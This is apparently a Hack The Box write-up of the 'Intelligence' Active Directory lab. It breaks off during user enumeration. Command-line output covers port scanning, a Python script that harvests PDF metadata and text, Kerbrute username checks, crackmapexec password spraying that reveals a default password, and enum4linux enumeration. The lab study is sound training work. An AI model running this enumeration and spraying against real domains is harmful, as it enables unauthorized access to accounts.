Intelligence

Completed on Aug 31, 2021

Overview

From the Active Directory machines HTB content developers have created, there is always something to learn. Intelligence gives you another approach on how an AD miconfiguration can lead to a domain compromise. In this case, unconstrained delegation is the path to owning AD; something that should definitely be avoided if possible or at least asset lock down. I hope this write-up provides some insight to others as it did for me while working on this machine.

References:

Enumeration

Finding Open Ports

Just like we normally do, we will try to find out what services are exposed so we know how to proceed. In this box, we will expand the port scan to UDP ports as well.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ nmap -Pn -p- --min-rate=1000 -T4 intelligence.htb -oN int_openPorts.log -oX int_openPorts.xml
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 23:43 EDT
Nmap scan report for intelligence.htb (10.129.95.154)
Host is up (0.045s latency).
Not shown: 65515 filtered ports
PORT      STATE SERVICE
53/tcp    open  domain
80/tcp    open  http
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49693/tcp open  unknown
49694/tcp open  unknown
49704/tcp open  unknown
49716/tcp open  unknown
51742/tcp open  unknown
 
Nmap done: 1 IP address (1 host up) scanned in 94.07 seconds

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ sudo nmap -Pn -sU -p- --min-rate=1000 -T4 intelligence.htb 
[sudo] password for jxberrios: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-27 23:49 EDT
Nmap scan report for intelligence.htb (10.129.95.154)
Host is up (0.045s latency).
Not shown: 65532 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp
389/udp open  ldap

Nmap done: 1 IP address (1 host up) scanned in 116.38 seconds

Let's run nmap default scripts and service versioning against the TCP ports found.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ PORTS=$(cat int_openPorts.log | grep tcp | cut -d "/" -f1 | xargs | tr " " ",")

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ nmap -sC -sV intelligence.htb -p $PORTS -oN int_PortScan.log -oX int_PortScan.xml                                                                                  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-28 00:00 EDT
Nmap scan report for intelligence.htb (10.129.95.154)
Host is up (0.042s latency).
 
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-28 10:58:17Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-28T10:59:47+00:00; +6h57m50s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49693/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49704/tcp open  msrpc         Microsoft Windows RPC
49716/tcp open  msrpc         Microsoft Windows RPC
51742/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
|_clock-skew: mean: 6h57m49s, deviation: 0s, median: 6h57m49s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled and required
| smb2-time:
|   date: 2021-08-28T10:59:08
|_  start_date: N/A
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 98.49 seconds

This machine has the typical open ports from domain controllers along with NTP and UDP LDAP, but let's just go through the process and inspect each service and try to rely on low hanging fruits.

From the certificate information in LDAP and LDAPS, we see dc.intelligence.htb. Let's add this to the hosts file.

Inspecting Web Application

After inspecting the site, we see two PDF documents can be downloaded.

Let's download and inspect these documents:

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ wget http://dc.intelligence.htb/documents/2020-01-01-upload.pdf
--2021-08-29 00:57:03--  http://dc.intelligence.htb/documents/2020-01-01-upload.pdf
Resolving dc.intelligence.htb (dc.intelligence.htb)... 10.129.30.68
Connecting to dc.intelligence.htb (dc.intelligence.htb)|10.129.30.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 26835 (26K) [application/pdf]
Saving to: ‘2020-01-01-upload.pdf’
 
2020-01-01-upload.pd 100%[=====================>]  26.21K  --.-KB/s    in 0.04s   
 
2021-08-29 00:57:03 (651 KB/s) - ‘2020-01-01-upload.pdf’ saved [26835/26835]
 
 
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ wget http://dc.intelligence.htb/documents/2020-12-15-upload.pdf
--2021-08-29 00:57:15--  http://dc.intelligence.htb/documents/2020-12-15-upload.pdf
Resolving dc.intelligence.htb (dc.intelligence.htb)... 10.129.30.68
Connecting to dc.intelligence.htb (dc.intelligence.htb)|10.129.30.68|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27242 (27K) [application/pdf]
Saving to: ‘2020-12-15-upload.pdf’
 
2020-12-15-upload.pd 100%[=====================>]  26.60K  --.-KB/s    in 0.04s   
 
2021-08-29 00:57:15 (683 KB/s) - ‘2020-12-15-upload.pdf’ saved [27242/27242]

Inspecting PDF Files

Using exiftool to inspect the PDF files:

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ exiftool 2020-01-01-upload.pdf 
ExifTool Version Number         : 12.16
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 26 KiB
File Modification Date/Time     : 2021:04:01 13:00:00-04:00
File Access Date/Time           : 2021:08:29 00:57:03-04:00
File Inode Change Date/Time     : 2021:08:29 00:57:03-04:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee
 
┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ exiftool 2020-12-15-upload.pdf 
ExifTool Version Number         : 12.16
File Name                       : 2020-12-15-upload.pdf
Directory                       : .
File Size                       : 27 KiB
File Modification Date/Time     : 2021:04:01 13:00:00-04:00
File Access Date/Time           : 2021:08:29 00:57:15-04:00
File Inode Change Date/Time     : 2021:08:29 00:57:15-04:00
File Permissions                : rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : Jose.Williams

From the content of these files, we now have a naming conversation for user accounts so let's create a users list including other possible combinations:

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat << EOF >> users.txt           
heredoc> William.Lee
heredoc> Jose.Williams
heredoc> administrator     
heredoc> wlee                                                           
heredoc> jwilliams                 
heredoc> Guest                   
heredoc> EOF

User Enumeration with Kerbrute

Using Kerbrute for user enumeration can help determine which ones are valid, and rule out what could be garbage:

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ kerbrute userenum --dc dc.intelligence.htb -d intelligence.htb users.txt
 
    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        
 
Version: dev (n/a) - 08/29/21 - Ronnie Flathers @ropnop
 
2021/08/29 01:42:53 >  Using KDC(s):
2021/08/29 01:42:53 >   dc.intelligence.htb:88
 
2021/08/29 01:42:53 >  [+] VALID USERNAME:   William.Lee@intelligence.htb
2021/08/29 01:42:53 >  [+] VALID USERNAME:   Jose.Williams@intelligence.htb
2021/08/29 01:42:53 >  [+] VALID USERNAME:   administrator@intelligence.htb
2021/08/29 01:42:53 >  Done! Tested 6 usernames (3 valid) in 0.048 seconds

Custom Scripting for PDF Content Extraction

Looking to see if there are more PDF files and to extract their information, we need to test the download and extract the metadata. For this, we created a script that will take care of the requests, creating a user list, extract the metadata while creating a file with the information from the found PDF files:

#!/usr/bin/env python3

import os
import requests
from pdfminer.high_level import extract_text
from pdfminer.pdfparser import PDFParser
from pdfminer.pdfdocument import PDFDocument


def main():
    URL = 'http://intelligence.htb/documents/'
    KEYWORD = 'user'

    os.mkdir("./pdf")

    for year in range(2020, 2022):
        for month in range(1, 13):
            for day in range(1, 32):
                pdf_file = "{0}-{1:02}-{2:02}-upload.pdf".format(
                    year,
                    month,
                    day
                )
                req = requests.get(URL + pdf_file)
                path = "./pdf/{}".format(pdf_file)

                if req.status_code == 200:
                    print("File: " + pdf_file)

                    with open(path, 'wb') as pdffile:
                        pdffile.write(req.content)

                    # Extracting PDF File Metadata
                    with open(path, 'rb') as pdffile:
                        creator = PDFDocument(PDFParser(
                            pdffile)).info[0]["Creator"].decode()
                        print("PDF Creator: " + creator)

                    # Creating User List from PDF Metadata
                    with open("./user_list.txt", 'a') as user:
                        user.write(creator + "\n")

                    # Extracting PDF Content
                    data = extract_text(path)
                    if KEYWORD in data:
                        print("Content: " + data)
                        with open("./valid_data.txt", 'a') as valid:
                            valid.write("File: {}\n\n".format(pdf_file))
                            valid.write("PDF Creator: {}\n\n".format(creator))
                            valid.write("Content: {}\n\n".format(data))
                    print("\n")

                    os.remove(path)
    os.rmdir("./pdf")

if __name__ == "__main__":
    main()

After running this script, we obtained a password along with a username from the PDF metadata:

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ cat valid_data.txt 
File: 2020-06-04-upload.pdf
 
PDF Creator: Jason.Patterson
 
Content: New Account Guide
 
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
 
After logging in please change your password as soon as possible.

The obvious next step is to test this password and attempt to use it with the PDF creator username.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ smbclient -L intelligence.htb -W "ingelligence.htb" -U "Jason.Patterson%NewIntelligenceCorpUser9876"
session setup failed: NT_STATUS_LOGON_FAILURE

Password Spraying

If we test with this credential set, this will not work but given the message in the PDF, doing some password spraying could lead us to a valid credential pair.

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ crackmapexec smb dc.intelligence.htb -d intelligence.htb -u user_list.txt -p NewIntelligenceCorpUser9876 --continue-on-success
SMB         intelligence.htb 445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         intelligence.htb 445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Daniel.Shelton:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Brian.Morris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jennifer.Thomas:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Darryl.Harris:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Scott.Scott:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\John.Coleman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Nicole.Brock:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Mcbride:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jason.Wright:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Brian.Baker:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Teresa.Williamson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Samuel.Richardson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Wilson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Thomas.Hall:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jason.Patterson:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Kelly.Long:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Danny.Matthews:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Travis.Evans:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jessica.Moody:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Thomas.Valenzuela:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Anita.Roberts:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Stephanie.Young:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\David.Reed:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Jose.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Veronica.Patel:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Ian.Duncan:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         intelligence.htb 445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE

This confirms the user which this password works with. The credential set is:

User: Tiffany.Molina
Password: NewIntelligenceCorpUser9876

SMB and LDAP Enumeration with Enum4Linux

The header of this section doesn't pay tribute to what enum4linux does as it is more than just SMB and LDAP, but let's expand our enumeration to other services:

┌──(jxberrios 👿 back0ff)-[~/…/Intelligence]
└─$ enum4linux -w 'intelligence.htb' -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876' -U -G -S -o intelligence.htb
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Sun Aug 29 21:11:26 2021

 =========================================( Target Information )=========================================

Target ........... intelligence.htb
RID Range ........ 500-550,1000-1050
Username ......... 'Tiffany.Molina'
Password ......... 'NewIntelligenceCorpUser9876'
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none


 ==========================( Enumerating Workgroup/Domain on intelligence.htb )==========================


[+] Got domain/workgroup name: intelligence.htb


 =================================( Session Check on intelligence.htb )=================================


[+] Server intelligence.htb allows sessions using username 'Tiffany.Molina', password 'NewIntelligenceCorpUser9876'


 ==============================( Getting domain SID for intelligence.htb )==============================

Domain Name: intelligence
Domain Sid: S-1-5-21-4210132550-3389855604-3437519686

[+] Host is part of a domain (not a workgroup)


 =================================( OS information on intelligence.htb )=================================


[E] Can't get OS info with smbclient


[+] Got OS info for intelligence.htb from srvinfo: 
	INTELLIGENCE.HTWk Sv PDC Tim NT     
	platform_id     :	500
	os version      :	10.0
	server type     :	0x80102b


 =====================================( Users on intelligence.htb )=====================================

index: 0xeda RID: 0x1f4 acb: 0x00000210 Account: Administrator	Name: (null)	Desc: Built-in account for administering the computer/domain
index: 0xf86 RID: 0x46b acb: 0x00000210 Account: Anita.Roberts	Name: (null)	Desc: (null)
index: 0xf7c RID: 0x461 acb: 0x00000210 Account: Brian.Baker	Name: (null)	Desc: (null)
index: 0xf87 RID: 0x46c acb: 0x00000210 Account: Brian.Morris	Name: (null)	Desc: (null)
index: 0xf88 RID: 0x46d acb: 0x00000210 Account: Daniel.Shelton	Name: (null)	Desc: (null)
index: 0xf6a RID: 0x44f acb: 0x00000210 Account: Danny.Matthews	Name: (null)	Desc: (null)
index: 0xf80 RID: 0x465 acb: 0x00000210 Account: Darryl.Harris	Name: (null)	Desc: (null)
index: 0xf6e RID: 0x453 acb: 0x00000210 Account: David.Mcbride	Name: (null)	Desc: (null)
index: 0xf70 RID: 0x455 acb: 0x00000210 Account: David.Reed	Name: (null)	Desc: (null)
index: 0xf7f RID: 0x464 acb: 0x00000210 Account: David.Wilson	Name: (null)	Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xf71 RID: 0x456 acb: 0x00000210 Account: Ian.Duncan	Name: (null)	Desc: (null)
index: 0xf8b RID: 0x470 acb: 0x00000210 Account: James.Curbow	Name: (null)	Desc: (null)
index: 0xf8d RID: 0x472 acb: 0x00000210 Account: Jason.Patterson	Name: (null)	Desc: (null)
index: 0xf6c RID: 0x451 acb: 0x00000210 Account: Jason.Wright	Name: (null)	Desc: (null)
index: 0xf85 RID: 0x46a acb: 0x00000210 Account: Jean.Walter	Name: (null)	Desc: (null)
index: 0xf73 RID: 0x458 acb: 0x00000210 Account: Jennifer.Thomas	Name: (null)	Desc: (null)
index: 0xf8c RID: 0x471 acb: 0x00000210 Account: Jeremy.Mora	Name: (null)	Desc: (null)
